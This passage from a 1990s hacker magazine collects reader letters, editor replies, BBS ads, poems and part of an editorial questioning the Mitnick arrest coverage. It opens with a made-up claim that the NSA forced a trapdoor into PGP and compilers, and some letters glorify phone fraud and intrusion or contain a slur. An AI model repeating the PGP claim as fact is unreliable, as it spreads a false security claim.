+ A lot of people think that PGP encryption is unbreakable and that the
+NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, and it can be a
+deadly mistake. In Idaho, a left-wing activist by the name of Craig Steingold
+was arrested  _one day_ before he and others wee to stage a protest at
+government buildings; the police had a copy of a message sent by Steingold
+to another activist, a message which had been encrypted with PGP and sent
+through E-mail.
+
+ Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to 
+allow the NSA to easily break encoded messages. Early in 1992, the author, 
+Paul Zimmerman, was arrested by Government agents. He was told that he 
+would be set up for trafficking narcotics unless he complied. The Government 
+agency's demands were simple: He was to put a virtually undetectable 
+trapdoor, designed by the NSA, into all future releases of PGP, and to
+tell no-one.
+
+ After reading this, you may think of using an earlier version of 
+PGP. However, any version found on an FTP site or bulletin board has been 
+doctored. Only use copies acquired before 1992, and do NOT use a recent 
+compiler to compile them. Virtually ALL popular compilers have been 
+modified to insert the trapdoor (consisting of a few trivial changes) into 
+any version of PGP prior to 2.1. Members of the boards of Novell, Microsoft, 
+Borland, AT&T and other companies were persuaded into giving the order for
+the modification (each ot these companies' boards contains at least one
+Trilateral Commission member or Bilderberg Committee attendant).
+
+ It took the agency more to modify GNU C, but eventually they did it.
+The Free Software Foundation was threatened with "an IRS investigation",
+in other words, with being forced out of business, unless they complied. The
+result is that all versions of GCC on the FTP sites and all versions above 
+2.2.3, contain code to modify PGP and insert the trapdoor. Recompiling GCC
+with itself will not help; the code is inserted by the compiler into
+itself. Recompiling with another compiler may help, as long as the compiler
+is older than from 1992.
+
+
+[Well, uh, gee, I think the fact that this document came from
+ /email-lists/Funny speaks for itself.  I'm satisfied with PGP
+ for security, but then again, I don't have a lot of information that
+ I'm so petrified that I need to keep it encrypted, or that I send
+ out in email that I don't care if anyone sees.
+
+ To put aside some of your fears, I personally feel that PGP is ok.
+ If the trilateral commission wants your info, they will beat it out
+ of you with sticks, with the help of several multi-jurisdictional
+ task-forces for Federal law enforcement, while you are under the influence
+ of incredibly terrifying and long-lasting hallucinogenic drugs.
+
+ Don't worry.]
+
+
+-----------------------------------------------------------------------------
+
+Here is a BBS Ad for your next issue:
+
+BBS Name: The King's Domain
+Sysop:    Ex-Nihilo
+Speeds:   1200-14,400
+BBS Type: Remote Access 2.02+
+Phone #:  208-466-1679
+
+THe BBS has a good selction of "Hood" files... (hacking/phreaking/anarchy)
+journals such as cDc, Phrack, ATI and more... also a good selection of
+BBS files which include Doors and Utilities... primarily RA accessories,
+but not exclusively... supports rip graphics and is online 24 hrs a day
+
+[Yet another ad!  Is this the rebirth of BBS-dom?]
+
+-----------------------------------------------------------------------------
+
+[Editor's Note:  I got a letter asking me about how to credit card
+ merchandise.  I replied that I didn't agree with carding, and that
+ if the reader really wanted something, he/she should get a job and buy it.
+ This is the response I got.]
+
+
+What the fuck?  All I wanted was a fucking decent reply.  Get a job, huh?
+You know, I thought if you were to talk to one of these supposed
+"computer hackers" you could get some usefull information.  Get a job, that
+rich coming from someone like you.
+
+When there's something you want...take it...without using your money.
+
+Maybe sometime I'll be able to takl to a hacker not some fucking
+hypocritical computer geek
+ 
+
+[Editor's Note:  I replied to this letter by stating that carding had nothing
+ to do with hacking, that it was out and out stealing, and although
+ we had published articles about it in Phrack, I wasn't going to help anyone
+ do it, and that he/she should try to contact the authors of various
+ carding articles directly.  This is the response that got.]
+
+Come on now "Chris", you can do better than that, can't you?
+Stealing?  Who's the thief here, eh? See, when I wake up in the morning,
+I don't have to worry about secret service, police, or any sort
+of military shit being in my apartment.  I don't get busted for doing stupid
+things like stealing phone calls off fucking 900 numbers.  I think I
+know exactly why you don't card anything - because you're too fucking stupid
+or don't even have the balls to do it. Fuck, you'd expect someone like
+yourself to have different views about being a thief. Well, I guess it
+takes a certain kind of person to hack into shit like you, but why this
+person would start flame wars and otherwise just be a total fuckup, I don't
+know. Or, maybe it's just the singular person I'm talking too, yeah, that's
+probably i...there probably are other, BETTER, hackers who aren't as
+fucking arrogant as you.
+
+Well, have fun with your hands and PLAYGIRL's, you fucking little punk-ass
+faggot.
+
+And tell your mother that I won't let this affect our relationship.
+
+Punk
+
+aj276@freenet3.carleton.ca
+
+[This is the future of the computer underground??]
+
+-----------------------------------------------------------------------------
+
+
+BBS AD:
+
+System is called CyberSphincter (playing off of the current word trend of
+cyber). The number is 717-788-7435.  The NUP is 0-DAY-WAR3Z!!!
+Modem speeds of 14.4 and lower, with no ANSI.  Sysop is Ha Ha Ha.
+
+It's running renegade (we know it can be hacked and I've done it already),
+but we seem to believe in honor among thieves, so try to control yourself on
+that.
+
+-=strata=-
+
+[ANOTHER AD!]
+
+-----------------------------------------------------------------------------
+
+Hey Erik B...
+
+I'm the remote sysop at the Digital Fallou BBS in 516.  Just recently,
+we've been getting a rash of ld callers.  A day or two ago, a guy with
+the handle "Digi-Hacker" applied.  His application looked good, execpt that
+he stated his alter handle was "Eric Bloodaxe" and that he was the editor
+of Phrack.  Now, any lame ass could just "say" that, and we don't want any
+liars on board.  :)  So we decided to go right to you thru email.  Did you
+apply?  If so, cool.  If this isn't you, that guy is gonna most assuredly
+be deleted..
+
+[Well, I hate to say it, but I don't have time to do much of anything
+ anymore.  I certainly don't call bbses with any regularity.  I
+ do have accounts on SECTEC and UPT, but that's it.  I may call some
+ in the future, but for the most part I don't have any time.  If someone
+ calls up a bulletin board and applies as "Erik Bloodaxe"  it isn't me.
+ (Anyone saying they are Eric Bloodaxe MOST CERTAINLY isn't me. :)  )
+
+ Anyone running BBSes may want to take note of this, so they don't get
+ swindled into giving "elite" access to some pretender.  You can
+ always email phrack@well.com and ask me if I have applied to your
+ bbs. ]
+
+-----------------------------------------------------------------------------
+
+Chris,
+
+I know you don't know me, but I figured you of all people could help me,
+and give me an answer quickly.
+
+I just got my phone bill, and on the last page is a page from some
+company calling themselves Long Distance Billing Co., Inc.  It has
+one call "Billed on behalf of Northstar Communication"  It is a call from
+somewhere in FL, for 13 minutes, costing 51.87.  I called LD Inc, and they
+said the call was a collect call made from Northstar Comm, and that
+my only recourse was to write a letter to Northstar. Needless to say, I
+did not accept the collect call, I don't know anyone in 813.  I called
+NYNEX, and they said I should write to Northstar and LD INC, but didn't
+seem to know anything about either company.  They guy I talked to said it
+was real strange that LD INC didn't give me a number to call at
+Northstar, since most of this type of thing is handled by phone.  I'm
+beginning to wonder exactly how relieable this LD INC company is, who
+Northstar is, and most of all who called and how the hell the call was
+supposedly accepted by my phone.  This is all the info I know:
+
+BILLED ON BEHALF OF NORTHSTAR COMMUNICATION
+
+1.  SEP 18 923PM COL CLEARWATER FL 813-524-5111 NC 13:00 51.87
+
+--From my phone bill
+
+Northstar Communication
+3665 East Bay Drive
+Suite 204-192
+Largo, FL 34641
+
+--From LD INC
+
+Long Distance Billing Co., Inc.
+
+1-800-748-4309
+
+--From NYNE phone bill.
+
+If you can think of anything I can do, I;d be really greatful.  I don't
+have $50 to throw away on a call I never got, and I don't have the
+resources you do to try and figure out who the hell these people are.
+
+[It looks to me like you got fucked by someone in Florida using a COCOT
+ payphone.  It's kind of odd that NYNEX couldn't help you more...but anyway,
+ I wouldn't pay it.
+
+ What I suspect happened was that somsone used one of those handy COCOT
+ services where the operators are incredibly stupid and allow calls
+ to be accepted when the "calling party" says "YES" to allow a 3rd party or
+ collect call, rather than the party being called.  This happened to me at
+ my previous work extension by New Yorkers using the ENCORE service (even
+ though all our lines were listed to refuse 3rd party and collect calls.)]
+
+-----------------------------------------------------------------------------
+
+I've been having some trouble with the law, so all my notes are stashed at
+a friend's casa at the moment.  Can you recommend a good lawyer to defend me
+for allegedly hacking some government computers?  I've got a good crim def
+guy working with me right now assisting me guring questioning from Special
+Agents, but I will need someone that has experience if I get indicted.
+
+[If you are facing computer crime charges, you are definately in
+ a world of hurt.  There are very few computer crime-savvy lawyers
+ practicing in the World.  The only thing I can suggest is that
+ you call EFF, CPSR or EPIC and ask them if they know of any
+ lawyers in your area that they can refer you to.  None of these
+ groups will help you directly, except under EXTREME circumstances, and
+ only if you have been falsely accused, or have had rights violated.
+ If you are guilty, and the cops have any evidence, you are going to be
+ convicted.
+
+ Remember Baretta?  "If you can't do the time, then don't do the crime."]
+
+
+-----------------------------------------------------------------------------
+
+Dear Chris,
+
+You probably don't remember me, but we corresponded about 3 years
+ago as part of my PhD research.  I was at Edinburgh University
+at the time and am not at UMIST in Manchester (British equivalent of MIT).
+
+The reson I'm writing is that I was awarded my PhD last March, and for one
+reason and another I've been sidetracked into a completely different field
+of research - the British National Health Service and the various ways
+computers are being used in it.
+
+I tried getting a publisher interested in the thesis, but with little luck.
+I also sent it to Jim and Gordon at CuD on disk for them to stick it on
+archive, but they had problems with the formatting of it and don't seem to
+have got round to archiving i.
+
+If you're interested I'd be quite happy to send a couple of disks to you
+and you can spread it around as you want.  It just seems a shame for the people
+on the net not to get a look at it.  It's dressed up in airy-fairy sociological
+language - but there's still lots in it that I think would be of interest to
+people on the net.  I saw your interview in CuD, and I agree with you about
+most of the books written on the CU.  Mine has its faults but it's got less
+biographical data and more issue-oriented stuff.
+
+Anyway, get in touch and let me know if I can find a good home for my magnum
+opus.
+
+Take care and a belated thanks for all the time you spent in helping me with
+the PhD.
+
+Best Wishes,
+
+Paul Taylor
+School of Management
+UMIST
+
+[Paul:
+
+ Congrats on your PHD, and continued success at UMIST!
+ I'm putting your thesis up on the Phrack WWW page so that more
+ people can get a look at it!
+
+ Thanks for sending it!]
+
+-----------------------------------------------------------------------------
+
+I read your article on hacking the French among other foreign governments.
+Sounds pretty fun, just for kicks the other night I did a search of all the
+computers I could get at in China.  One of them was a national power grid
+computer. Sounds like it could be fun to play with huh?  The "They Might Kill
+Us" part will tend to turn some people off, but not me.
+
+[WOW!  A National Power Grid Computer!  In China!  Gee.  How many times
+ have you seen Sneakers?  Take the tape out of your VCR, slowly run
+ a rare-earth magnet over it and set it on fire.
+
+ On the other hand, if you were at least partally serious about the
+ hacking for America, keep your eyes open.]
+
+
+-----------------------------------------------------------------------------
+
+Erikb,
+
+Regarding your article in Phrack 46, we here in Columbus would
+just like to say that everything except for the Krack Baby's phone number,
+which long since went down, and the Free Net template, is total and utter
+bullshit.  The Columbus 2600 meetings were NOT started by Fungal Mutoid, he
+is just responsible for a much larger turnout since about September (94), and
+whoever wrote that has obviously not been to a Columbus meeting recently.
+The Columbus 2600's have been here for quite a while, but bacause the H/P
+scene consists of 15 people AT THE MOST, many of which haven't the time to
+attend, the turnout is almost always low.  I believe the most that have ever
+shown up to a meeting is 10, which dwindled to 8 or so before the
+meeting was officially half-over.  Nobody knows who wrote the article which
+you printed, although no one has been able to contact Fungal Mutoid to ask him.
+Just thought we'd clear a few things up, and to those that don't give two
+flying shits, we're sorry to have to bring this into a E-mag as great as
+this.
+
+Sincerely,
+
+H.P. Hovercraft and
+the Columbus H/P Gang
+
+[Thanks for the letter.  Like I always say, I can only report and print what
+ I'm told or what is sent to me.  I don't live anywhere but Austin, TX, so
+ I don't know the intimacies of other areas.  Thanks for sending in your
+ comments though!]
+
+-----------------------------------------------------------------------------
+
+Haiku
+
+Operator hi
+who is it that sets my phone
+on redial and tone
+
+gives me rest in times
+great stress lays its head on my
+leads me into joy
+
+cosmos and mizar
+give evidence and homage
+to your greatness, why
+
+logon/password
+on your very first try shall
+succeed, as always
+
+oh, A T and T
+while great, holds non to the great
+power that NYNEX
+
+gives access to in
+glee, awaitnig, cautiously,
+for signs of entry
+
+illicitly thus
+strives to maintain control of
+the ESS switch,
+
+not comprehending
+that control is simply gained
+by a single call
+
+to some stupid yet
+revered operator who
+believes you in charge
+
+gives out system pass
+with some small feat of trick'ry
+PAD to PAD, too, works
+
+sounding of the baud
+with modem and coupler
+connection is made
+
+who is to question
+the incidence of this fault
+or acknowledge it
+
+security's words
+false threats followed by arrest
+on illegal grounds
+
+hackers, phreakers grieve
+free the unjustly accused
+give them freedom to
+
+ROAM with cellular
+phones place to place with no charge
+test the system's worth
+
+find holes, detect bugs
+run systems by remote, yea,
+to explore, to seek,
+
+to find a network
+of free bits and bytes unharmed--
+innocently seen.
+
+who doesn't know that
+Bell or Sprint or MCI
+would never approve--
+
+believe in 'puter crime,
+toll fraud, "access devices,"
+free calls to Denmark
+
+Information is
+power is imperative
+proprietary
+
+please, spare me the grief
+accusations being thrown
+of phone co. crashes
+
+are fiction unleashed
+to the ignorant public
+eye to make blame, fear
+
+all phr/ackers, but all
+have had their days and faded
+into the past, why
+
+must ignorant block
+the free flow of knowledge found
+angry sysops abound
+
+secret service rais
+hoisting games, computers, phones
+never to be re-
+
+turned hackers, phreakers
+working for government, spies,
+lies, deception, all
+
+to walk free while friends
+spend years in jail for simply
+battling for some change
+
+knowledge is NOT free
+equipment costing milliions,
+simply cannot pay
+
+the cost for systems
+of signal switching; no on e
+wants to harm, just try
+
+to use our knowledge
+in a constructive way and
+look around for things
+
+which further know-how
+of packet switching, ANI,
+proctor tests and tones
+
+which make little sense
+and why is it there, what are
+all the test lines for?
+
+central office trash
+provides some clues, while phone calls
+get angry response
+
+to inquiries re:
+loops and lack of barriers,
+COCOT carriers
+
+who overcharge cause
+frustraton, must be helped
+end overbilling
+
+unfairness is only
+people not understanding
+nor comprehending
+
+that what we do is
+NOT always fraud, vengeance or
+deceitful reasons
+
+bu for love of the
+systems, curiosity's
+overwhealming need
+
+to be met and to
+feel accomplished, proud, to
+do and know something
+
+WELL crackers abound
+pirates do multiply, spread
+wavez of warez cross coasts
+
+and foreign countries
+virus creators seeking
+escape, growth, freedom
+
+not for destruction
+but for change, to press limits
+to find that which makes
+
+us whole, complete, and
+accomplished at crossing
+the barriers that
+
+bound conventional
+people in dead-end jobs with
+little self-esteem.
+
+hacking, phreaking, it
+is an art form, and a quest
+for endless reaches
+
+to seek, to explore, to
+realize and accomplish, to
+take chances and live
+
+not for rules and laws
+but for what things should be but
+will not come to pass.
+
+
+--kyra
+
+[Uh oh, we're getting pretty literary here.  I can see it now:
+
+ Phrack Magazine.  For the Sensitive Hack/Phreak.
+
+ Interesing poem tho...]
+
+
+-----------------------------------------------------------------------------
+
+Dear Editor of Phrack Magazine;
+Ok Erik (mr. editor), there is also a poem that I have written for Wei.
+
+"Thinking of Ding Wei"
+(C) 1994, 1995 Oliver Richman.
+
+Come here, let me tell you something,
+How I hide my love for Wei Ding:
+By forgetting all my thinking!
+
+When in my mind Wei's heart I see..
+I want to tell her "wo ai ni",
+So her and I will always be.
+
+Her mind is pure, like pretty Jade..
+She makes me want to give her aid.
+I know that her love will not fade.
+
+My patience tries to move the sea.
+But can I deny you and me?
+I want our hearts to set us free.
+
+I really love you, dear Ding Wei,
+I think about you every day.
+Tell me, what more can I say?
+
+[What's this?  Another Poem?  A tribute of Love for some chick named Wei?
+ Holy Lord.  We need to get some codes or credit cards or something in here
+ to offset this burst of "Heartfelt Emotive Print." ]
+
+-----------------------------------------------------------------------------
+
+the other day upon the stair
+i met a man who wasn't there
+he wasn't there again today
+i think he's from the CIA
+
+
+[NOW THIS IS MY KIND OF POETRY!  SHORT, SIMPLE, AND FUNNY.
+ WHATEVER HAPPENED TO BENNETT CERF???]
+
+-----------------------------------------------------------------------------
+
+As a former AOLite and definite wannabe, and having d/l the log of
+the Rushkoff/Sirius hypechat, I could tell from the beginning that it
+would be just as you reviewed _Cyberia_ as being.  Every other word
+Rushkoff used was Cyberia or Cyberians.  As lueless and vulnerable to hype
+as I was, I couldn't help but stand back and listen to all the shit with a
+grin.  In the same not, I ran into David Brin on AOL as well, and managed
+to get a correspondence goig with him.  He was on discussing all the
+research he did on the "Net" and about the papers he was delivering, and,
+most importantly (of course), his upcoming BOOK about the Internet and
+privacy.  At the time, still under the glossy spell of Wired (which I still
+find interesting) and the hype, I was eager to offer him an interview
+proposal, which I would have published in Wired if at all possible.
+
+Dr. Brin knew less than *I* did about the Internet.  I can sum up most of
+these people's vocabularies in one word:  "BLAH."  They may as well
+reiterate that syllable ad infinitum--it amounts to the same thing.
+
+[WOW!
+
+ Hey Cyber-guy, thanks for the super-cyber email.  As we cruise along this
+ InfoBanh, exiting in Cyberia, it takes a diligent cyberian like you
+ to keep things in check!
+
+ Sorry bout that.  I was overcome with a minor brain malfunction that
+ reduced my IQ to that of Douglas Rushkoff.  Doesn't it all make you want
+ to puke?
+
+ I heard that yesterday on the soap opera "Loving" some character was hacking
+ into food companies to steal recipes.  A month or so back, on "All My
+ Children"  (The only soap I watch...but I'm embarrassed to say I watch it
+ religiously), Charlie & Cecily were dorking around on the Internet, and
+ sent each other email after reading notes they each left on alt.personals.
+
+ The world is coming to an end.]
+
+-----------------------------------------------------------------------------
+
+Yo erikb:
+
+yo dewd.  eye am so paranoid, my t33th are rattling.
+what dewd eye dew?
+yew are the god of the internet.
+how dew eye stop the paranoia?
+please print answer in next phrack.
+thanx.
+m0fo
+
+[Your Acid will wear off in a few hours.  Don't worry.  Enjoy it.
+ The CIA does.
+
+ If it doesn't go away in a few days, there are some nice men in
+ white lab coats who will be glad to help you out.
+
+ How do you stop the paranoia?  Your answer:  Thorazine!]
+
+-----------------------------------------------------------------------------
+
+This is Nemo Kowalski speaking (aka Paolo Bevilacqua).
+I just discovered Phrack at the young age of 31. ;-)
+Well, I like it a lot, at least like I enjoyed doing real
+things here in Europe, alone and with DTE222, years ago.
+I'm going to write something about the first anti-hacker operation
+in Italy, "Hacker Hunter," in which, incidentally, I got busted.
+Do you think your some of the old stories from altger and Itapac
+can be of interest to your readers?
+
+To Robert Clark:
+
+I read "My Bust" and I liked it.  I'm not a native english speaker,
+but I think it was well-written, plus principally, I felt a pleasant
+"reader sharing writer's experiences" sensation that can separate a good
+reading from pure BS.  This is expecially true since I've been busted here
+in Italy, and I've learned that things are more similar around the
+western world than I would have thought.
+
+The only thing I can't share is your Seattle experience.   Maybe the dichotomy
+good druge/bad drugs has a different meaning for you?
+
+Respect,
+
+Nemo
+
+[Nemo:
+
+ Please write as much or as little as you like about the busts in
+ Italy!  We have an article this issue about Italy, but any further
+ insights into your experiences, esspecially regarding how busts
+ are carried out in other countries would be greatly appreciated by
+ our readers!
+
+ I look forward to reading whatever you can put together!]
+
+-----------------------------------------------------------------------------
+
+Chris,
+
+As a relative neophyte to hacking, one of the problems I come up with a
+lot is identifying systems I locate scanning.  So, I was wondering if Phrack,
+or any other zine, had ever published a concise guide to clues to
+help identify unknown systems.  If so, could you please let me know what
+mag, and what issue.
+
+One last thing, are there any internet sites with info of interest to hackers?
+I know about eff.org and freeside.com and a few others, but nothing really
+intriguing...any suggestions?
+
+[You will find a good start to identifying strange systems, and in
+ locating sites of interest to hackers in the #Hack FAQ we've printed
+ in this issue.  ]
+
+-----------------------------------------------------------------------------
+
+For Phrack news, Darkman was busted in Winnipeg City, Canada, for various
+reasons, but since I knew him personally I wanted to add my two cents.
+For the record, he was busted for warez and porn as well as hacking into the
+UoManitoba, and I heard his wife left him because he spent too much time
+pirating on IRC.  He was about 38.  He could read fluently in Russign, and
+I remember one night we discovered some secret KGB documents from the 50's,
+real science fiction thriller stuff, and he read it to me.
+
+Akalabeth
+
+[It's a drag that your friend was busted, and knowing the Canadian
+ government, the porn part was probably pretty minor shit in a worldly
+ sense.
+
+ I'm kinda intrugued by the "KGB Documents" you found.  Uh, were these on
+ the net?  Did you have a cyrillic character set loaded?  How did you
+ read these documents?  Were they on paper?
+
+ SEND THEM TO PHRACK!  :)  ]
+
+-----------------------------------------------------------------------------
+
+Top 10 Reasons Why I Should Get My Subscription FREE:
+
+(1)  I'm a programmer/Analyst for an electric utility company in Texas
+     (ahh, come on - I'm a fellow Texan!)
+
+(2)  I've read Phrack for years (loyalty scores points - right?)
+
+(3)  I've been involved with compuers since GOD created the PC
+     (I began in late 70's-early 80's).
+
+(4)  I'm *not* a narc (shh, don't tell anybody.)
+
+(5)  I *may* have a record (but if I do, it's for minor kind of stuff -
+     I'm basically a nice guy).
+
+(6)  I don't like the telephone company (you have to admit they're amusing
+     though.)
+
+(7)  I know how to get around on the 'net (can't you tell - I have an AOL
+     account <g>.)
+
+(8)  I'm a good source of info regarding all types of mainframe and PC
+     programming.
+
+(9)  PLEASE....
+
+(10) I'll quit writing dumb letters and trying to be funny.
+
+[David Letterman is in the background throwing up as I'm typing
+
+ Don't quit your day job...but I'll send you Phrack anyway. :) ]
+
+-----------------------------------------------------------------------------
+
+Hey Chris,
+
+I just read your thing in Phrack abou the US being attacked by our so
+called "allies" and I agree with you 110%!  I do believe that we should start
+some sort of CyberArmy to fight back.  I don't think that our government
+would mind, unless we crashed an economy that they were involved with or
+something, but hell, they fuck with us, let's fuck with them.  And you were
+saying about phone costs, isn't it possible to just telnet or something over
+there?  And why stop at fighting back against our information agressors, why
+not fight back against other countries that our government is too chickenshit
+to fight against?  Cuba comes to mind.  Well, I hope you reply or something, I
+really like Phrack, I try to get it whenever I can manage, but I don't
+have an internet address where I can get files.  Keep up the good work.
+
+[Yet another volunteer for the US Cyber Corp!  By God, I'll have
+ an army yet.  :)  ]
+
+-----------------------------------------------------------------------------
+
+
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 2a of 23
+
+*****************************************************************************
+
+                                Phrack Editorial
+
+What you are about to read is pure speculation on my part.  Do not take
+this to be 100% fact, since most of it is hypothesis.  But it sure will
+make you think twice.  "Ever get the feeling you're being cheated?"
+
+-----------------------------------------------------------------------------
+
+So...Mitnick was busted.
+
+There certainly are some really odd things regarding the whole mess,
+especially with regards to the "investigating" being done by
+a certain heretofore unheralded "security" professional and
+a certain reporter.
+
+One of the first oddities was the way the Mitnick saga suddenly
+reappeared in the popular media.  In February, and seemingly out of
+nowhere, the ever diligent John Markoff entered the scene with the
+a groundbreaking story.  (Of course this is meant to be sarcastic as
+hell.)  Markoff's story dealt with a near miss by federal authorities
+trying to apprehend Mr. Mitnick in Seattle about 5 months prior.
+
+Now, if nothing else happened in the whole Mitnick saga, I never would
+have given this a second thought, but in light of what followed,
+it really does seem odd.  Why would someone write about a subject that
+is extremely dated of no current newsworthiness?  "Our top story tonight:
+Generalissimo Francisco Franco is still dead."
+
+To be fair, I guess Markoff has had a hard on for Mitnick for ages.
+Word always was that Mitnick didn't really like the treatment he got
+in Markoff's book "Cyberpunk" and had been kinda screwing with him for
+several years.  (Gee, self-proclaimed techie-journalist writes something
+untrue about computer hackers and gets harassed...who would have thought.)
+So it really isn't that odd that Markoff would be trying to stay abreast
+of Mitnick-related info, but it certainly is odd that he would wait
+months and months after the fact to write something up.
+
+But wait, a scant month and a half later, Mitnick gets busted!  Not
+just busted, but tracked down and caught through the efforts of a
+computer security dude who had been hacked by Mitnick.  Breaking the
+story was none other than our faithful cyber-newshawk, John Markoff.
+
+"Tsutomo Shimomura, born to an American mother and a Japanese father,
+thus becan life as he was destined to live it...going in several
+directions at once.  A brilliant neurosurgeon, this restless young man
+grew quickly dissatisfied with a life devoted solely to medicine.
+He roamed the planet studying martial arts and particle physics,
+colelcting around him a most eccentric group of friends, those
+hard-rocking scientists The Hong Kong Cavaliers.
+
+"And now, with his astounding jet car ready for a bold assault on the
+dimension barrier, Tsutomo faces the greatest challenge of his turbulent
+life...
+
+"...while high above Earth, an alien spacecraft keeps a nervous watch on
+Team Shimomura's every move..."
+
+Wait a minute...that's Buckaroo Banzai.  But the similarities are almost
+eerie.  Security dude by day, hacker tracker by night, ski patrol
+rescue guy, links to the NSA!  WOWOW!  What an incredible guy!  What an
+amazing story!
+
+But wait!  Let's take a closer look at all of this bullshit, before it
+becomes so thick all we can see is tinted brown.
+
+Shimomura was supposedly hacked on Christmas Eve by Kevin Mitnick, which
+set him off on a tirade to track down the guy who hacked his system.
+Supposedly numerous IP tools were taken as well as "millions of dollars
+worth of cellular source code."
+
+First off, Shimomura's TAP is available via ftp.  Modified versions of this
+have been floating around for a while.  I suppose it's safe to assume that
+perhaps Tsutomo had modified it himself with further modifications (perhaps
+even some of the IP/localhost spoofs that the X-consortium guys were
+playing with, or maybe other tricks like denial of service and source-routing
+tricks...I don't really know, I don't have any such thing authored by
+Shimomura.)
+
+Secondly, what is all this cellular source code?  And why did Shimomura have
+it?  Could it be that this is really just some kind of smokescreen to make
+it seem like Mitnick did something bad?  For those of you who don't know,
+Tsutomo is friends with Mark Lottor (yes, the OKI experimenter, and CTEK
+manufacturer.).  They have been friends for some time, but I don't know
+how long.  Lottor used to be roommates with, lo and behold, Kevin Poulsen!
+Yes, that Kevin Poulsen...the guy who before Mitnick was the "computer
+criminal de jour."  Poulsen and Mitnick were no strangers.
+
+It wouldn't be too much of a stretch of the imagination to think that
+those files were really ROM dumps from phones that Lottor had given
+Shimomura.  It also wouldn't be too much of a stretch to imagine that
+Mitnick knew Tsutomo, and decided to go poke around, pissing off
+Tsutomo who knew that he'd been violated by SOMEONE HE ACTUALLY KNEW!
+(It sure does piss me off much more to get fucked over by someone I know
+rather than a complete stranger.)
+
+Woah.  If any of that is true, what strange bedfellows we have.  But wait,
+it gets better...
+
+Enter John Markoff.  Markoff and Tsutomo have obviously known each other for
+a while.  I don't know where they met...but I know they were together
+at Defcon, maybe at Hope, and probably at the Tahoe Hacker's conference
+a few years back.  (I'd have to go back and look over the group
+photos to be certain.)
+
+Markoff already has a stake in the Mitnick story, since it was his book,
+"Cyberpunk" that really gave ol' Kevin some coverage.  Now, if Markoff knew
+that Mitnick had hacked Tsutomo (from Tsutomo's own mouth), then certainly
+any journalist worth his salt would see possibilities.  Gee, what a great
+concept!  A colorful computer security guy tracks down one of the world's
+most wanted hackers!  What a great story!  Remember that Stoll Guy?
+
+But in order to get the book publishers really hot, it would take some more
+press to rejuvinate interest in the Mitnick story.  So the first story,
+months after the fact, is printed.
+
+Meanwhile, Tsutomo is supposedly tracking down Mitnick.
+
+How does one track down a hacker?  The legal (and really annoyingly hard way)
+is to work with other system administrators and establish a trail via
+tcp connects and eventually back to a dialup, then work with phone companies
+to establish a trap and trace (which usually takes two or three calls) and
+then working with local police to get a warrant.  Somehow Tsutomo seemingly
+managed to avoid all this hassle and get a lot done by himself.  How?
+Well, the Air Force OSI managed to track down the British Datastream Cowboy
+by hacking into the systems he was hacking into the Air Force from.  This is
+the easy way.  Hmmm.
+
+I know with a good degree of certainty that Markoff's and Tsutomo's little
+escapades pissed off a great many people within law enforcement, but I don't
+know exactly why.  If they WERE bumbling around stepping on FBI toes
+during the course of their litle hunt, certainly the FBI would have
+threatened them with some kind of obstruction of justice sentence if they
+didn't stop.  Did they?
+
+Well before any of this had begun, Mitnick had been hacking other places
+too. Guess what?  He happened to hack CSCNS, where a certain ex-hacker, Scott
+Chasin, runs the security side of things. I remember well over a year ago
+talking to Chasin about a hacker who had breeched CNS.  Discussing his
+methods, we thought it must be Grok, back from the netherworld, since he
+was so skilled.  The hacker also made claims of being wireless to avoid
+being traced.  (This also fit into the Grok modus operandi...so we just
+assumed it was indeed Grok and left it at that.)  Chasin told the hacker
+to get off of CNS, and that he could have an account on crimelab.com, if
+he would only use it for mail/irc/whatever, but with no hacking, and on
+the agreement that he would leave CSCNS alone.
+
+The agreement was made, but went sour after only a few weeks when the mystery
+hacker began going after CSCNS again.  The Colorado Springs FBI was called
+in to open an investigation.  This was ages ago, but of course, field agencies
+rarely talk.
+
+Back in the present, Tsutomo goes to help out at the Well, where
+a certain admin (pei) was having problems with intruders.  This is the
+same pei who a few months earlier told Winn Schwartau "The Well has no
+security!" Which Winn reported in his newsletter.  (This of course came after
+Winn's account on the Well was reactvated by an anonymous person who
+posted several messages about Markoff and signed them "km."  DUH!)
+
+So somehow, Tsutomo gets trace information leading back to a cell site in
+North Carolina.  How does a private citizen get this kind of information?
+Don't ask me!  My guess is that the feds said, give us what you know,
+help us out a bit and don't get in our way.  In return, one can surmise
+that Tsutomo (and Markoff) got to glean more info about the investigation
+by talking with the feds.
+
+So, Mitnick gets busted, and Tsutomo got to ride around in a car with
+a Signal Strength Meter and help triangulate Mitnick's cellular activity
+to his apartment.  Woo woo!
+
+After all is said and done, Tsutomo has single handedly captured Mitnick,
+John Markoff breaks the story on the FRONT PAGE of the New York Times, and
+every other computer reporter in America continually quotes and
+paraphrases Markoff's story and research as "God's Own Truth."
+
+Mitnick, on the other hand, gets blamed for:
+
+ 1) hacking Tsutomo
+ 2) hacking the Well
+ 3) hacking Netcom to get credit cards
+ 4) hacking CSCNS
+ 5) hacking Janet Reno's Cell Phone
+ 6) hacking motorola
+ 7) conversing with foreign nationals
+ etc..
+
+Let's look at some these charges:
+
+1) Mitnick was not the first (or only) to hack Tsutomo.  The San Deigo
+   Supercomputer Center is a target for a lot of people.  It's a major
+   Internet center, and there are all kinds of goodies there, and the
+   people who work there are smart guys with nice toys.  Sorry, but
+   Mitnick is the scapegoat here.
+
+2) Mitnick was not the first, last, or most recent to hack The Well.
+   Like Pei said, "The Well Has No Security."  I know this first hand,
+   since I have an account there.  I don't raise a stink about it,
+   because I pay by check, and my email is boring.
+
+3) Mitnick was not the person who got the Netcom credit card file.
+   That file floated around for quite some time.  He might have had
+   a copy of it, but so do countless others.  Sorry.  Wrong again.
+
+4) Mitnick was in CNS.  He was not the only one.  Thanks for playing.
+
+5) The thought that Mitnick could reprogram a MTSO to reboot upon
+   recognizing a ESN/MIN pair belonging to one specific individual
+   would require that he had hacked the manufacturer of the MTSO, and
+   gotten source code, then hacked the cellular carrier and gotten
+   a full database of ESN/MIN information.  Both of these things have
+   been done by others, and Mitnick certainly could have done them too,
+   but I doubt he would have gone to that much trouble to call attention
+   to his actions.
+
+6) Motorola, like EVERY other big-time computer industry giant has been
+   hacked by countless people.
+
+7) Mitnick reportedly had dealings with foreign nationals, especially
+   one "Israeli" that set the CIA up in arms.  Well, sure, if you get on
+   IRC and hang out, you are probably going to talk to people from other
+   countries.  If you hang out on #hack and know your stuff, you will probably
+   end up trading info with someone.  But, playing devil's advocate,
